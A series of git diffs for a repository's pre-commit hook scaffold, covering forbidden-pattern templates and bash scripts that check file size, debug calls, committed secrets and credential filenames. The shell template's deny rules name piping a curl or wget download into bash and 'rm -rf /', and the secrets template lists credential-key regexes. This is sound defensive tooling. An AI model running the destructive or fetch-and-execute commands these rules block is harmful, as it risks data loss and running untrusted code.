 # Copy to your project as `.forbidden-patterns/backend.txt`.
 
-[[:<:]]print[[:space:]]*\(	Use structlog (or the project's logger), not print()
+\bprint\s*\(	Use structlog (or the project's logger), not print()
 os\.path\.join	Use pathlib.Path(), not os.path.join
-[[:<:]]breakpoint[[:space:]]*\(	Remove breakpoint() before committing
-[[:<:]]pdb\.set_trace[[:space:]]*\(	Remove pdb.set_trace() before committing
-[[:<:]]ipdb\.set_trace[[:space:]]*\(	Remove ipdb.set_trace() before committing
+\bbreakpoint\s*\(	Remove breakpoint() before committing
+\bpdb\.set_trace\s*\(	Remove pdb.set_trace() before committing
+\bipdb\.set_trace\s*\(	Remove ipdb.set_trace() before committing
 
 # Optional: forbid TODO/FIXME/XXX in one line via regex alternation.
-# [[:<:]](TODO|FIXME|XXX)[[:>:]]	TODO/FIXME/XXX not allowed — open a ticket instead
+# \b(TODO|FIXME|XXX)\b	TODO/FIXME/XXX not allowed — open a ticket instead
 #
 # Optional (PCRE only — ERE doesn't support lookahead): flag TODO/FIXME/XXX
 # only when missing a ticket ref like (PROJ-123). Requires grep -P (GNU only).

--- a/forbidden-patterns/backend.txt.template
+++ b/forbidden-patterns/backend.txt.template
@@ -4,14 +4,14 @@
 # (e.g. `(TODO|FIXME|XXX)`). Patterns cannot contain a literal TAB.
 # Copy to your project as `.forbidden-patterns/backend.txt`.
 
-\bprint\s*\(	Use structlog (or the project's logger), not print()
+(^|[^A-Za-z_])print[[:space:]]*\(	Use structlog (or the project's logger), not print()
 os\.path\.join	Use pathlib.Path(), not os.path.join
-\bbreakpoint\s*\(	Remove breakpoint() before committing
-\bpdb\.set_trace\s*\(	Remove pdb.set_trace() before committing
-\bipdb\.set_trace\s*\(	Remove ipdb.set_trace() before committing
+(^|[^A-Za-z_])breakpoint[[:space:]]*\(	Remove breakpoint() before committing
+(^|[^A-Za-z_])pdb\.set_trace[[:space:]]*\(	Remove pdb.set_trace() before committing
+(^|[^A-Za-z_])ipdb\.set_trace[[:space:]]*\(	Remove ipdb.set_trace() before committing
 
 # Optional: forbid TODO/FIXME/XXX in one line via regex alternation.
-# \b(TODO|FIXME|XXX)\b	TODO/FIXME/XXX not allowed — open a ticket instead
+# (^|[^A-Za-z_])(TODO|FIXME|XXX)($|[^A-Za-z0-9_])	TODO/FIXME/XXX not allowed — open a ticket instead
 #
 # Optional (PCRE only — ERE doesn't support lookahead): flag TODO/FIXME/XXX
 # only when missing a ticket ref like (PROJ-123). Requires grep -P (GNU only).

--- a/forbidden-patterns/backend.txt.template
+++ b/forbidden-patterns/backend.txt.template
@@ -4,11 +4,11 @@
 # lines or character classes for alternation.
 # Copy to your project as `.forbidden-patterns/backend.txt`.
 
-\bprint\s*\(|Use structlog (or the project's logger), not print()
+[[:<:]]print[[:space:]]*\(|Use structlog (or the project's logger), not print()
 os\.path\.join|Use pathlib.Path(), not os.path.join
-\bbreakpoint\s*\(|Remove breakpoint() before committing
-\bpdb\.set_trace\s*\(|Remove pdb.set_trace() before committing
-\bipdb\.set_trace\s*\(|Remove ipdb.set_trace() before committing
+[[:<:]]breakpoint[[:space:]]*\(|Remove breakpoint() before committing
+[[:<:]]pdb\.set_trace[[:space:]]*\(|Remove pdb.set_trace() before committing
+[[:<:]]ipdb\.set_trace[[:space:]]*\(|Remove ipdb.set_trace() before committing
 
 # Optional: uncomment to forbid TODO/FIXME/XXX (one line per keyword — regex can't use `|`).
 # \bTODO\b|TODO not allowed — open a ticket instead

--- a/forbidden-patterns/frontend.txt.template
+++ b/forbidden-patterns/frontend.txt.template
@@ -1,21 +1,11 @@
 # Forbidden patterns for TS/JS files (*.ts, *.tsx, *.js, *.jsx). Applied by .githooks/pre-commit.
-# Format: <regex>|<description>   (one per line; # comments ignored)
-# Patterns cannot contain a literal `|` (the field separator) — use multiple
-# lines or character classes for alternation.
+# Format: <regex><TAB><description>   (one per line; # comments ignored)
+# Separator is TAB — patterns can contain literal `|` for ERE alternation.
 # Copy to your project as `.forbidden-patterns/frontend.txt`.
 
-[[:<:]]console\.log[[:space:]]*\(|Use the project logger, not console.log
-[[:<:]]debugger[[:>:]]|Remove debugger statement before committing
-[[:<:]]alert[[:space:]]*\(|Don't ship alert() calls — use a proper UI dialog
+[[:<:]]console\.log[[:space:]]*\(	Use the project logger, not console.log
+[[:<:]]debugger[[:>:]]	Remove debugger statement before committing
+[[:<:]]alert[[:space:]]*\(	Don't ship alert() calls — use a proper UI dialog
 
-# Optional: uncomment to forbid TODO/FIXME/XXX (one line per keyword — regex can't use `|`).
-# \bTODO\b|TODO not allowed — open a ticket instead
-# \bFIXME\b|FIXME not allowed — open a ticket instead
-# \bXXX\b|XXX not allowed — open a ticket instead
-#
-# Optional (PCRE): flag TODO/FIXME/XXX only when missing a ticket ref like (PROJ-123).
-# The hook and CI use `grep -E` (ERE), which supports neither lookahead nor this pattern's
-# `|` alternation in one line. Enabling this requires rewriting the hook to use `grep -P`
-# (GNU grep only; macOS needs `brew install grep`) and changing the config parser to not
-# split on `|`. Kept here as reference only.
-# (TODO|FIXME|XXX)(?!\s*\([A-Z]+-[0-9]+\))
+# Optional: forbid TODO/FIXME/XXX in one line via regex alternation.
+# [[:<:]](TODO|FIXME|XXX)[[:>:]]	TODO/FIXME/XXX not allowed — open a ticket instead

--- a/forbidden-patterns/frontend.txt.template
+++ b/forbidden-patterns/frontend.txt.template
@@ -4,9 +4,9 @@
 # lines or character classes for alternation.
 # Copy to your project as `.forbidden-patterns/frontend.txt`.
 
-\bconsole\.log\s*\(|Use the project logger, not console.log
-\bdebugger\b|Remove debugger statement before committing
-\balert\s*\(|Don't ship alert() calls — use a proper UI dialog
+[[:<:]]console\.log[[:space:]]*\(|Use the project logger, not console.log
+[[:<:]]debugger[[:>:]]|Remove debugger statement before committing
+[[:<:]]alert[[:space:]]*\(|Don't ship alert() calls — use a proper UI dialog
 
 # Optional: uncomment to forbid TODO/FIXME/XXX (one line per keyword — regex can't use `|`).
 # \bTODO\b|TODO not allowed — open a ticket instead

--- a/forbidden-patterns/frontend.txt.template
+++ b/forbidden-patterns/frontend.txt.template
@@ -3,9 +3,9 @@
 # Separator is TAB — patterns can contain literal `|` for ERE alternation.
 # Copy to your project as `.forbidden-patterns/frontend.txt`.
 
-[[:<:]]console\.log[[:space:]]*\(	Use the project logger, not console.log
-[[:<:]]debugger[[:>:]]	Remove debugger statement before committing
-[[:<:]]alert[[:space:]]*\(	Don't ship alert() calls — use a proper UI dialog
+\bconsole\.log\s*\(	Use the project logger, not console.log
+\bdebugger\b	Remove debugger statement before committing
+\balert\s*\(	Don't ship alert() calls — use a proper UI dialog
 
 # Optional: forbid TODO/FIXME/XXX in one line via regex alternation.
-# [[:<:]](TODO|FIXME|XXX)[[:>:]]	TODO/FIXME/XXX not allowed — open a ticket instead
+# \b(TODO|FIXME|XXX)\b	TODO/FIXME/XXX not allowed — open a ticket instead

--- a/forbidden-patterns/frontend.txt.template
+++ b/forbidden-patterns/frontend.txt.template
@@ -3,9 +3,9 @@
 # Separator is TAB — patterns can contain literal `|` for ERE alternation.
 # Copy to your project as `.forbidden-patterns/frontend.txt`.
 
-\bconsole\.log\s*\(	Use the project logger, not console.log
-\bdebugger\b	Remove debugger statement before committing
-\balert\s*\(	Don't ship alert() calls — use a proper UI dialog
+(^|[^A-Za-z_])console\.log[[:space:]]*\(	Use the project logger, not console.log
+(^|[^A-Za-z_])debugger($|[^A-Za-z0-9_])	Remove debugger statement before committing
+(^|[^A-Za-z_])alert[[:space:]]*\(	Don't ship alert() calls — use a proper UI dialog
 
 # Optional: forbid TODO/FIXME/XXX in one line via regex alternation.
-# \b(TODO|FIXME|XXX)\b	TODO/FIXME/XXX not allowed — open a ticket instead
+# (^|[^A-Za-z_])(TODO|FIXME|XXX)($|[^A-Za-z0-9_])	TODO/FIXME/XXX not allowed — open a ticket instead

--- a/forbidden-patterns/secrets.txt.template
+++ b/forbidden-patterns/secrets.txt.template
@@ -1,32 +1,32 @@
 # Forbidden patterns for secret / credential leakage.
 # Applied to all tracked text files (no extension filter, case-insensitive).
-# Format: <regex>|<description>   (one per line; # comments ignored)
+# Format: <regex><TAB><description>   (one per line; # comments ignored)
 # Copy to your project as `.forbidden-patterns/secrets.txt`.
 #
 # All patterns are ERE-compatible (no PCRE lookaheads).
-# Patterns CANNOT contain a literal `|` (the field separator) — use multiple
-# lines or character classes for alternation. In character classes, place `-`
-# at the start or end to keep it literal (BSD grep rejects `\-`). Prefix
-# patterns are high-specificity to keep the false-positive rate low.
+# Separator is TAB — patterns can contain literal `|` for ERE alternation.
+# In character classes, place `-` at the start or end to keep it literal
+# (BSD grep rejects `\-`). Prefix patterns are high-specificity to keep the
+# false-positive rate low.
 
 # Cloud / SaaS tokens — prefix-specific, very low false-positive rate
-AKIA[0-9A-Z]{16}|AWS access key ID — rotate immediately
-AIza[0-9A-Za-z_-]{35}|Google API key — rotate immediately
-gh[pousr]_[A-Za-z0-9]{36,}|GitHub token — rotate immediately
-xox[baprs]-[A-Za-z0-9-]{10,}|Slack token — rotate immediately
-sk-[A-Za-z0-9]{48,}|OpenAI / Anthropic-style API key — rotate immediately
+AKIA[0-9A-Z]{16}	AWS access key ID — rotate immediately
+AIza[0-9A-Za-z_-]{35}	Google API key — rotate immediately
+gh[pousr]_[A-Za-z0-9]{36,}	GitHub token — rotate immediately
+xox[baprs]-[A-Za-z0-9-]{10,}	Slack token — rotate immediately
+sk-[A-Za-z0-9]{48,}	OpenAI / Anthropic-style API key — rotate immediately
 
 # Private keys of any flavor (RSA / EC / DSA / OPENSSH / bare)
------BEGIN [A-Z ]*PRIVATE KEY-----|Private key in source — rotate and move to a secret manager
+-----BEGIN [A-Z ]*PRIVATE KEY-----	Private key in source — rotate and move to a secret manager
 
 # URL with embedded credentials — e.g. protocol scheme + userinfo + host
-[a-z]+://[^[:space:]:/@]+:[^[:space:]/@]+@[^[:space:]/]+|URL with embedded credentials — use env vars
+[a-z]+://[^[:space:]:/@]+:[^[:space:]/@]+@[^[:space:]/]+	URL with embedded credentials — use env vars
 
-# Hardcoded credentials in assignments — one pattern per keyword (can't `|` in regex).
-# Value must be 16+ chars of token-like content to dodge test fixtures / short placeholders.
-password[[:space:]]*[:=][[:space:]]*['"][A-Za-z0-9_/+=-]{16,}['"]|Hardcoded password — use env vars or a secret manager
-passwd[[:space:]]*[:=][[:space:]]*['"][A-Za-z0-9_/+=-]{16,}['"]|Hardcoded password — use env vars or a secret manager
-token[[:space:]]*[:=][[:space:]]*['"][A-Za-z0-9_/+=-]{16,}['"]|Hardcoded token — use env vars or a secret manager
-api[-_]?key[[:space:]]*[:=][[:space:]]*['"][A-Za-z0-9_/+=-]{16,}['"]|Hardcoded API key — use env vars or a secret manager
-secret[-_]?key[[:space:]]*[:=][[:space:]]*['"][A-Za-z0-9_/+=-]{16,}['"]|Hardcoded secret — use env vars or a secret manager
-access[-_]?token[[:space:]]*[:=][[:space:]]*['"][A-Za-z0-9_/+=-]{16,}['"]|Hardcoded access token — use env vars or a secret manager
+# Hardcoded credentials in assignments. Value must be 16+ chars of token-like
+# content to dodge test fixtures / short placeholders.
+password[[:space:]]*[:=][[:space:]]*['"][A-Za-z0-9_/+=-]{16,}['"]	Hardcoded password — use env vars or a secret manager
+passwd[[:space:]]*[:=][[:space:]]*['"][A-Za-z0-9_/+=-]{16,}['"]	Hardcoded password — use env vars or a secret manager
+token[[:space:]]*[:=][[:space:]]*['"][A-Za-z0-9_/+=-]{16,}['"]	Hardcoded token — use env vars or a secret manager
+api[-_]?key[[:space:]]*[:=][[:space:]]*['"][A-Za-z0-9_/+=-]{16,}['"]	Hardcoded API key — use env vars or a secret manager
+secret[-_]?key[[:space:]]*[:=][[:space:]]*['"][A-Za-z0-9_/+=-]{16,}['"]	Hardcoded secret — use env vars or a secret manager
+access[-_]?token[[:space:]]*[:=][[:space:]]*['"][A-Za-z0-9_/+=-]{16,}['"]	Hardcoded access token — use env vars or a secret manager

--- a/forbidden-patterns/secrets.txt.template
+++ b/forbidden-patterns/secrets.txt.template
@@ -23,10 +23,6 @@ sk-[A-Za-z0-9]{48,}	OpenAI / Anthropic-style API key — rotate immediately
 [a-z]+://[^[:space:]:/@]+:[^[:space:]/@]+@[^[:space:]/]+	URL with embedded credentials — use env vars
 
 # Hardcoded credentials in assignments. Value must be 16+ chars of token-like
-# content to dodge test fixtures / short placeholders.
-password[[:space:]]*[:=][[:space:]]*['"][A-Za-z0-9_/+=-]{16,}['"]	Hardcoded password — use env vars or a secret manager
-passwd[[:space:]]*[:=][[:space:]]*['"][A-Za-z0-9_/+=-]{16,}['"]	Hardcoded password — use env vars or a secret manager
-token[[:space:]]*[:=][[:space:]]*['"][A-Za-z0-9_/+=-]{16,}['"]	Hardcoded token — use env vars or a secret manager
-api[-_]?key[[:space:]]*[:=][[:space:]]*['"][A-Za-z0-9_/+=-]{16,}['"]	Hardcoded API key — use env vars or a secret manager
-secret[-_]?key[[:space:]]*[:=][[:space:]]*['"][A-Za-z0-9_/+=-]{16,}['"]	Hardcoded secret — use env vars or a secret manager
-access[-_]?token[[:space:]]*[:=][[:space:]]*['"][A-Za-z0-9_/+=-]{16,}['"]	Hardcoded access token — use env vars or a secret manager
+# content to dodge test fixtures / short placeholders. Six per-keyword lines
+# collapsed into one alternation now that the separator is TAB.
+(password|passwd|token|api[-_]?key|secret[-_]?key|access[-_]?token)[[:space:]]*[:=][[:space:]]*['"][A-Za-z0-9_/+=-]{16,}['"]	Hardcoded credential — use env vars or a secret manager

--- a/forbidden-patterns/secrets.txt.template
+++ b/forbidden-patterns/secrets.txt.template
@@ -25,4 +25,4 @@ sk-[A-Za-z0-9]{48,}	OpenAI / Anthropic-style API key — rotate immediately
 # Hardcoded credentials in assignments. Value must be 16+ chars of token-like
 # content to dodge test fixtures / short placeholders. Six per-keyword lines
 # collapsed into one alternation now that the separator is TAB.
-(password|passwd|token|api[-_]?key|secret[-_]?key|access[-_]?token)[[:space:]]*[:=][[:space:]]*['"][A-Za-z0-9_/+=-]{16,}['"]	Hardcoded credential — use env vars or a secret manager
+(^|[^A-Za-z_])(password|passwd|token|api[-_]?key|secret[-_]?key|access[-_]?token)[[:space:]]*[:=][[:space:]]*['"][A-Za-z0-9_/+=-]{16,}['"]	Hardcoded credential — use env vars or a secret manager

--- a/forbidden-patterns/shell.txt.template
+++ b/forbidden-patterns/shell.txt.template
@@ -1,6 +1,6 @@
 # Forbidden patterns for shell scripts (*.sh, *.bash). See forbidden-patterns/README.md.
 # Copy to your project as `.forbidden-patterns/shell.txt`.
 
-(curl|wget)[[:space:]][^[:space:]]*[[:space:]]*\|[[:space:]]*(bash|sh|zsh)([[:space:]]|$)	Piping remote download to a shell — review the script and run it as a separate step
-rm[[:space:]]+-[rfRF]+[[:space:]]+/[[:space:]]*([;&]|$)	`rm -rf /` detected — refuse to ship; scope to a specific path
-chmod[[:space:]]+(-[a-zA-Z]+[[:space:]]+)*0?777([[:space:]]|$)	chmod 0?777 — overly permissive; scope to specific user/group bits
+(^|[^A-Za-z_])(curl|wget)[[:space:]][^[:space:]]*[[:space:]]*\|[[:space:]]*(bash|sh|zsh)([[:space:]]|$)	Piping remote download to a shell — review the script and run it as a separate step
+(^|[^A-Za-z_])rm[[:space:]]+-[rfRF]+[[:space:]]+/[[:space:]]*([;&]|$)	`rm -rf /` detected — refuse to ship; scope to a specific path
+(^|[^A-Za-z_])chmod[[:space:]]+(-[a-zA-Z]+[[:space:]]+)*0?777([[:space:]]|$)	chmod 0?777 — overly permissive; scope to specific user/group bits

--- a/forbidden-patterns/shell.txt.template
+++ b/forbidden-patterns/shell.txt.template
@@ -1,0 +1,6 @@
+# Forbidden patterns for shell scripts (*.sh, *.bash). See forbidden-patterns/README.md.
+# Copy to your project as `.forbidden-patterns/shell.txt`.
+
+(curl|wget)[[:space:]][^[:space:]]*[[:space:]]*\|[[:space:]]*(bash|sh|zsh)([[:space:]]|$)	Piping remote download to a shell — review the script and run it as a separate step
+rm[[:space:]]+-[rfRF]+[[:space:]]+/[[:space:]]*([;&]|$)	`rm -rf /` detected — refuse to ship; scope to a specific path
+chmod[[:space:]]+(-[a-zA-Z]+[[:space:]]+)*0?777([[:space:]]|$)	chmod 0?777 — overly permissive; scope to specific user/group bits

--- a/githooks/lib/check-filenames.template
+++ b/githooks/lib/check-filenames.template
@@ -1,0 +1,47 @@
+#!/usr/bin/env bash
+# .githooks/lib/check-filenames — block committed credentials by filename.
+# Reads file paths on stdin. Rejects .env (allowing
+# .env.example/.sample/.template), *.pem, and SSH private key names.
+#
+# Output: human-readable on tty; ::error file=...:: when --ci is passed.
+# Exit:   0 if all OK, 1 if any violation.
+
+set -euo pipefail
+
+CI_MODE=0
+[ "${1:-}" = "--ci" ] && CI_MODE=1
+
+emit() {
+  local file=$1 message=$2
+  if [ "$CI_MODE" -eq 1 ]; then
+    echo "::error file=$file::$message"
+  else
+    echo "✗ $file: $message"
+  fi
+}
+
+FAILED=0
+while IFS= read -r file; do
+  [ -z "$file" ] && continue
+  case "$file" in
+    *.pem)
+      emit "$file" "PEM file (likely private key) — rotate and use a secret manager"
+      FAILED=1
+      continue
+      ;;
+  esac
+  name=$(basename "$file")
+  case "$name" in
+    .env.example|.env.sample|.env.template) ;;
+    .env|.env.*)
+      emit "$file" "environment file — use .env.example for shared config, keep secrets in env vars"
+      FAILED=1
+      ;;
+    id_rsa|id_ed25519|id_ecdsa|id_dsa)
+      emit "$file" "SSH private key — rotate it and use a secret manager"
+      FAILED=1
+      ;;
+  esac
+done
+
+exit $FAILED

--- a/githooks/lib/check-patterns.template
+++ b/githooks/lib/check-patterns.template
@@ -1,7 +1,8 @@
 #!/usr/bin/env bash
 # .githooks/lib/check-patterns — forbidden-pattern scan for source files.
 # Reads file paths on stdin. Scans .py against backend.txt and TS/JS
-# against frontend.txt. Pattern format: <regex>|<description>.
+# against frontend.txt. Pattern format: <regex><TAB><description>
+# (TAB is the field separator so regex can use literal `|` alternation).
 #
 # Output: human-readable on tty; ::error file=...:: when --ci is passed.
 # Exit:   0 if all OK, 1 if any violation.
@@ -22,7 +23,7 @@ scan() {
   [ -f "$config" ] || return 0
   [ ${#FILES[@]} -eq 0 ] && return 0
 
-  while IFS='|' read -r pattern description; do
+  while IFS=$'\t' read -r pattern description; do
     [ -z "$pattern" ] && continue
     case "$pattern" in \#*) continue ;; esac
 

--- a/githooks/lib/check-patterns.template
+++ b/githooks/lib/check-patterns.template
@@ -1,0 +1,53 @@
+#!/usr/bin/env bash
+# .githooks/lib/check-patterns — forbidden-pattern scan for source files.
+# Reads file paths on stdin. Scans .py against backend.txt and TS/JS
+# against frontend.txt. Pattern format: <regex>|<description>.
+#
+# Output: human-readable on tty; ::error file=...:: when --ci is passed.
+# Exit:   0 if all OK, 1 if any violation.
+
+set -euo pipefail
+
+CI_MODE=0
+[ "${1:-}" = "--ci" ] && CI_MODE=1
+
+FILES=()
+while IFS= read -r f; do
+  [ -n "$f" ] && [ -f "$f" ] && FILES+=("$f")
+done
+
+scan() {
+  local config=$1
+  shift
+  [ -f "$config" ] || return 0
+  [ ${#FILES[@]} -eq 0 ] && return 0
+
+  while IFS='|' read -r pattern description; do
+    [ -z "$pattern" ] && continue
+    case "$pattern" in \#*) continue ;; esac
+
+    for file in "${FILES[@]}"; do
+      local matched=0
+      for ext in "$@"; do
+        case "$file" in *."$ext") matched=1; break ;; esac
+      done
+      [ "$matched" -eq 1 ] || continue
+
+      if grep -nE -- "$pattern" "$file" >/dev/null 2>&1; then
+        if [ "$CI_MODE" -eq 1 ]; then
+          echo "::error file=$file::$description"
+        else
+          echo "✗ $file: $description"
+          grep -nE -- "$pattern" "$file" | head -3 | sed 's/^/    /'
+        fi
+        FAILED=1
+      fi
+    done
+  done <"$config"
+}
+
+FAILED=0
+scan ".forbidden-patterns/backend.txt" py
+scan ".forbidden-patterns/frontend.txt" ts tsx js jsx
+
+exit $FAILED

--- a/githooks/lib/check-patterns.template
+++ b/githooks/lib/check-patterns.template
@@ -50,5 +50,6 @@ scan() {
 FAILED=0
 scan ".forbidden-patterns/backend.txt" py
 scan ".forbidden-patterns/frontend.txt" ts tsx js jsx
+scan ".forbidden-patterns/shell.txt" sh bash
 
 exit $FAILED

--- a/githooks/lib/check-secrets.template
+++ b/githooks/lib/check-secrets.template
@@ -2,7 +2,8 @@
 # .githooks/lib/check-secrets — secret/credential pattern scan.
 # Reads file paths on stdin. Scans against .forbidden-patterns/secrets.txt
 # (case-insensitive), skipping binaries, lockfiles, and the pattern config
-# directory itself.
+# directory itself. Pattern format: <regex><TAB><description>
+# (TAB is the field separator so regex can use literal `|` alternation).
 #
 # Output: human-readable on tty; ::error file=...:: when --ci is passed.
 # Exit:   0 if all OK, 1 if any violation.
@@ -30,7 +31,7 @@ done
 [ ${#FILES[@]} -eq 0 ] && exit 0
 
 FAILED=0
-while IFS='|' read -r pattern description; do
+while IFS=$'\t' read -r pattern description; do
   [ -z "$pattern" ] && continue
   case "$pattern" in \#*) continue ;; esac
 

--- a/githooks/lib/check-secrets.template
+++ b/githooks/lib/check-secrets.template
@@ -1,0 +1,50 @@
+#!/usr/bin/env bash
+# .githooks/lib/check-secrets — secret/credential pattern scan.
+# Reads file paths on stdin. Scans against .forbidden-patterns/secrets.txt
+# (case-insensitive), skipping binaries, lockfiles, and the pattern config
+# directory itself.
+#
+# Output: human-readable on tty; ::error file=...:: when --ci is passed.
+# Exit:   0 if all OK, 1 if any violation.
+
+set -euo pipefail
+
+CI_MODE=0
+[ "${1:-}" = "--ci" ] && CI_MODE=1
+
+CONFIG=".forbidden-patterns/secrets.txt"
+[ -f "$CONFIG" ] || exit 0
+
+FILES=()
+while IFS= read -r f; do
+  [ -z "$f" ] && continue
+  case "$f" in
+    *.svg|*.png|*.jpg|*.jpeg|*.gif|*.ico|*.pdf) continue ;;
+    *.lock|*.zip|*.tar|*.gz|*.woff|*.woff2|*.ttf|*.mp4|*.mov) continue ;;
+    package-lock.json|pnpm-lock.yaml) continue ;;
+    .forbidden-patterns/*) continue ;;
+  esac
+  [ -f "$f" ] && FILES+=("$f")
+done
+
+[ ${#FILES[@]} -eq 0 ] && exit 0
+
+FAILED=0
+while IFS='|' read -r pattern description; do
+  [ -z "$pattern" ] && continue
+  case "$pattern" in \#*) continue ;; esac
+
+  for file in "${FILES[@]}"; do
+    if grep -niE -- "$pattern" "$file" >/dev/null 2>&1; then
+      if [ "$CI_MODE" -eq 1 ]; then
+        echo "::error file=$file::$description"
+      else
+        echo "✗ $file: $description"
+        grep -niE -- "$pattern" "$file" | head -3 | sed 's/^/    /'
+      fi
+      FAILED=1
+    fi
+  done
+done <"$CONFIG"
+
+exit $FAILED

--- a/githooks/lib/check-size.template
+++ b/githooks/lib/check-size.template
@@ -1,0 +1,34 @@
+#!/usr/bin/env bash
+# .githooks/lib/check-size — file-size cap.
+# Reads file paths on stdin (one per line). Reports any source file
+# exceeding MAX_LINES (default 500). Skips docs, data, and binary types.
+#
+# Output: human-readable on tty; ::error file=...:: when --ci is passed.
+# Exit:   0 if all OK, 1 if any violation.
+
+set -euo pipefail
+
+MAX_LINES=${MAX_LINES:-500}
+CI_MODE=0
+[ "${1:-}" = "--ci" ] && CI_MODE=1
+
+FAILED=0
+while IFS= read -r file; do
+  [ -z "$file" ] && continue
+  [ -f "$file" ] || continue
+  case "$file" in
+    *.md|*.json|*.toml|*.yaml|*.yml|*.lock|*.txt|*.csv|*.sql) continue ;;
+    *.svg|*.png|*.jpg|*.jpeg|*.gif|*.ico|*.pdf) continue ;;
+  esac
+  lines=$(wc -l <"$file" | tr -d ' ')
+  if [ "$lines" -gt "$MAX_LINES" ]; then
+    if [ "$CI_MODE" -eq 1 ]; then
+      echo "::error file=$file::$lines lines (max $MAX_LINES) — extract a module"
+    else
+      echo "✗ $file: $lines lines (max $MAX_LINES) — extract a module"
+    fi
+    FAILED=1
+  fi
+done
+
+exit $FAILED

--- a/githooks/lib/check-size.template
+++ b/githooks/lib/check-size.template
@@ -20,7 +20,9 @@ while IFS= read -r file; do
     *.md|*.json|*.toml|*.yaml|*.yml|*.lock|*.txt|*.csv|*.sql) continue ;;
     *.svg|*.png|*.jpg|*.jpeg|*.gif|*.ico|*.pdf) continue ;;
   esac
-  lines=$(wc -l <"$file" | tr -d ' ')
+  # `grep -c ''` counts every line, including a trailing line without a
+  # final newline (which `wc -l` would silently miss).
+  lines=$(grep -c '' "$file" || true)
   if [ "$lines" -gt "$MAX_LINES" ]; then
     if [ "$CI_MODE" -eq 1 ]; then
       echo "::error file=$file::$lines lines (max $MAX_LINES) — extract a module"

--- a/githooks/pre-commit.template
+++ b/githooks/pre-commit.template
@@ -1,128 +1,33 @@
 #!/usr/bin/env bash
-# Pre-commit hook enforcing file size limits + forbidden patterns.
+# Pre-commit hook orchestrator — calls the four check scripts in lib/.
+# Each lib/check-* script is independently runnable; the CI workflow
+# invokes the same scripts so the hook and CI can never drift.
 #
-# Install (from project root):
-#   mkdir -p .githooks && cp <scaffold>/githooks/pre-commit.template .githooks/pre-commit
-#   chmod +x .githooks/pre-commit
+# Install (from project root) — install.sh handles all of this:
+#   .githooks/pre-commit
+#   .githooks/lib/{check-size,check-patterns,check-filenames,check-secrets}
 #   git config core.hooksPath .githooks
 #
 # Patterns are read from:
-#   .forbidden-patterns/backend.txt   (lines: regex|description; applied to *.py)
-#   .forbidden-patterns/frontend.txt  (lines: regex|description; applied to *.ts,*.tsx,*.js,*.jsx)
+#   .forbidden-patterns/backend.txt   (regex|description; applied to *.py)
+#   .forbidden-patterns/frontend.txt  (regex|description; applied to *.ts,*.tsx,*.js,*.jsx)
+#   .forbidden-patterns/secrets.txt   (regex|description; applied to all text files)
 #
 # Lines starting with # in those files are comments.
 
 set -euo pipefail
 
-MAX_LINES=${MAX_LINES:-500}
-FAILED=0
+HOOK_DIR="$(cd "$(dirname "$0")" && pwd)"
+LIB="$HOOK_DIR/lib"
 
 STAGED=$(git diff --cached --name-only --diff-filter=ACMR)
 [ -z "$STAGED" ] && exit 0
 
-# ---------- 1. File size ----------
-while IFS= read -r file; do
-  [ -f "$file" ] || continue
-  # Skip non-source file types (docs, configs, data)
-  case "$file" in
-    *.md|*.json|*.toml|*.yaml|*.yml|*.lock|*.txt|*.csv|*.sql) continue ;;
-    *.svg|*.png|*.jpg|*.jpeg|*.gif|*.ico|*.pdf) continue ;;
-  esac
-  LINES=$(wc -l < "$file" | tr -d ' ')
-  if [ "$LINES" -gt "$MAX_LINES" ]; then
-    echo "✗ $file: $LINES lines (max $MAX_LINES) — extract a module"
-    FAILED=1
-  fi
-done <<< "$STAGED"
-
-# ---------- 2. Forbidden patterns ----------
-check_patterns() {
-  local config=$1
-  local glob_filter=$2
-  [ -f "$config" ] || return 0
-
-  while IFS='|' read -r pattern description; do
-    # Skip comments and blank lines
-    [ -z "$pattern" ] && continue
-    case "$pattern" in \#*) continue ;; esac
-
-    while IFS= read -r file; do
-      [ -f "$file" ] || continue
-      # Filter by extension
-      local matched=0
-      for ext in $glob_filter; do
-        case "$file" in *."$ext") matched=1; break ;; esac
-      done
-      [ "$matched" -eq 1 ] || continue
-
-      if grep -nE -- "$pattern" "$file" >/dev/null 2>&1; then
-        echo "✗ $file: $description"
-        grep -nE -- "$pattern" "$file" | head -3 | sed 's/^/    /'
-        FAILED=1
-      fi
-    done <<< "$STAGED"
-  done < "$config"
-}
-
-check_patterns ".forbidden-patterns/backend.txt" "py"
-check_patterns ".forbidden-patterns/frontend.txt" "ts tsx js jsx"
-
-# ---------- 3. Secrets (all files, case-insensitive) ----------
-check_secrets() {
-  local config=".forbidden-patterns/secrets.txt"
-  [ -f "$config" ] || return 0
-
-  while IFS='|' read -r pattern description; do
-    [ -z "$pattern" ] && continue
-    case "$pattern" in \#*) continue ;; esac
-
-    while IFS= read -r file; do
-      [ -f "$file" ] || continue
-      # Skip binaries, lockfiles, and the pattern config itself (false positives on example text)
-      case "$file" in
-        *.svg|*.png|*.jpg|*.jpeg|*.gif|*.ico|*.pdf) continue ;;
-        *.lock|*.zip|*.tar|*.gz|*.woff|*.woff2|*.ttf|*.mp4|*.mov) continue ;;
-        package-lock.json|pnpm-lock.yaml) continue ;;
-        .forbidden-patterns/*) continue ;;
-      esac
-
-      if grep -niE -- "$pattern" "$file" >/dev/null 2>&1; then
-        echo "✗ $file: $description"
-        grep -niE -- "$pattern" "$file" | head -3 | sed 's/^/    /'
-        FAILED=1
-      fi
-    done <<< "$STAGED"
-  done < "$config"
-}
-check_secrets
-
-# ---------- 4. Blocked filenames ----------
-check_blocked_filenames() {
-  while IFS= read -r file; do
-    [ -z "$file" ] && continue
-    case "$file" in
-      *.pem)
-        echo "✗ $file: PEM file (likely private key) — rotate and use a secret manager"
-        FAILED=1
-        continue
-        ;;
-    esac
-    local name
-    name=$(basename "$file")
-    case "$name" in
-      .env.example|.env.sample|.env.template) ;;
-      .env|.env.*)
-        echo "✗ $file: environment file — use .env.example for shared config, keep secrets in env vars"
-        FAILED=1
-        ;;
-      id_rsa|id_ed25519|id_ecdsa|id_dsa)
-        echo "✗ $file: SSH private key — rotate it and use a secret manager"
-        FAILED=1
-        ;;
-    esac
-  done <<< "$STAGED"
-}
-check_blocked_filenames
+FAILED=0
+echo "$STAGED" | "$LIB/check-size"      || FAILED=1
+echo "$STAGED" | "$LIB/check-patterns"  || FAILED=1
+echo "$STAGED" | "$LIB/check-filenames" || FAILED=1
+echo "$STAGED" | "$LIB/check-secrets"   || FAILED=1
 
 if [ "$FAILED" -ne 0 ]; then
   echo ""

--- a/githooks/pre-commit.template
+++ b/githooks/pre-commit.template
